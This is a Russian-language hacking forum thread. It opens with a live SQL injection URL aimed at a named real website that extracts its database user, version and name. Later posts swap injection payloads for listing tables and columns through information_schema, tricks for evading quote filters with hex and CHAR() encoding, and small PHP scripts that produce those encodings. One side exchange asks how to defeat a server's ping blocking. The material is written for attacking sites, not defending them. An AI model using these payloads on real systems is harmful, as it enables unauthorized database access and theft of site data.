http://www.worstpreviews.com/headline2.php?id=-16149+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8
Может не туда конечно пишу. Скажите почему не пингуется главная машина в сети (192.168.0.1). Все 40 компьютеров в сети пингуются, а сервак ни в какую. Что он сделал чтобы не пинговалось? И можно ли как нибудь это одолеть?
ИМХО если сеть работает, то это гон, что сервер не пингуеться В любом случаи сервер должен пинговаться
А смысл? Я так понимаю, ICMP используется для передачи сообщений об ошибках, возникших при передаче данных.
а пинги по твоему это не трафик? "пинги" это и есть icmp пакеты, и отрубается это легко как и сказал oRb
как узнать какие столбцы в таблице? http://site.com/uid=1+union+select+1,2,3,table_name+from+information_schema.tables-- Узнаем таблицы. http://site/uid=-1 UNION SELECT 1,2,3, COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS-- А так по идее название столбцов?
вообще твои запросы покатит не везде Code: +where+table_name='table' реал покатит перевести в Hex - кодировку Code: +where+table_name=0x7461626c65 где 0x7461626c65 = table З.Ы. а еще можно попытать счастье угадывая поля
скорее всего фильтруются кавычки, и на этот случай, специально для нас разработчики придумали функцию CHAR(), которой необходимо передать ASCII код символа, или несколько ASCII кодов через запятую. Допустим, запрос SELECT CHAR(117,115,101,114,115) вернет тебе users, кавычки при этом туда вбивать не надо. PS. А вот тебе скриптик, чтобы автоматом генерить эту комбинацию. PHP: <form action='' method='POST'> <input type='text' name='ascii' /> <input type='submit' name='gogo' /> </form> <hr/> <?php if($_POST['gogo'] && $_POST['ascii'] != ''){ for($i = 0; $i < strlen($_POST['ascii']); $i++){ $arr[] = substr($_POST['ascii'], $i, 1); } $str = 'char('; foreach($arr as $k=>$v) { if($k == count($arr) - 1){ $str .= ord($v).')'; break; } $str .= ord($v).','; } echo $str; } ?>
И вместо всего этого понта-поста достаточно было написать PHP: <?php echo '0x'.bin2hex($_GET['c']);?>
